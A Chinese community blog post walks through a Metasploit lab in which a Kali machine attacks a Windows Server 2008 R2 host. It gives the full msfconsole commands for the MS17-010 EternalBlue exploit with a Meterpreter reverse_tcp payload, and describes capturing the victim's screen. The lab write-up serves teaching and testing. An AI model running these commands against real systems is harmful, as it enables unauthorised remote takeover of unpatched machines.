Metasploit使用

举报
Superman can't fly 发表于 2023/11/01 20:43:54 2023/11/01
【摘要】 Metasploit实验环境Win2008R2 IP:192.168.10.130Kali IP:192.168.10.128实验步骤启用Metasploit启动postgresql服务搜索ms17_010找到辅助模块渗透扫描windows的samba服务 msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/m...

Metasploit

实验环境

Win2008R2 IP:192.168.10.130

1.png

Kali IP:192.168.10.128

2.png

实验步骤

启用Metasploit

启动postgresql服务

3.png

搜索ms17_010找到辅助模块5.png

6.png

7.png

渗透扫描windows的samba服务

 msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

设置被渗透IP

 msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.10.130
 rhosts => 192.168.10.130(Win2008R2 IP)

设置payload

 msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
 payload => windows/x64/meterpreter/reverse_tcp

设置本机的IP

 msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128
 lhost => 192.168.10.128  (Kali的IP地址)

8.png

9.png

查看获取的权限

10.png

截图被渗透主机的屏幕

11.png

在文件夹中找到此图片打开

12.png

【版权声明】本文为华为云社区用户原创内容,未经允许不得转载,如需转载请自行联系原作者进行授权。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。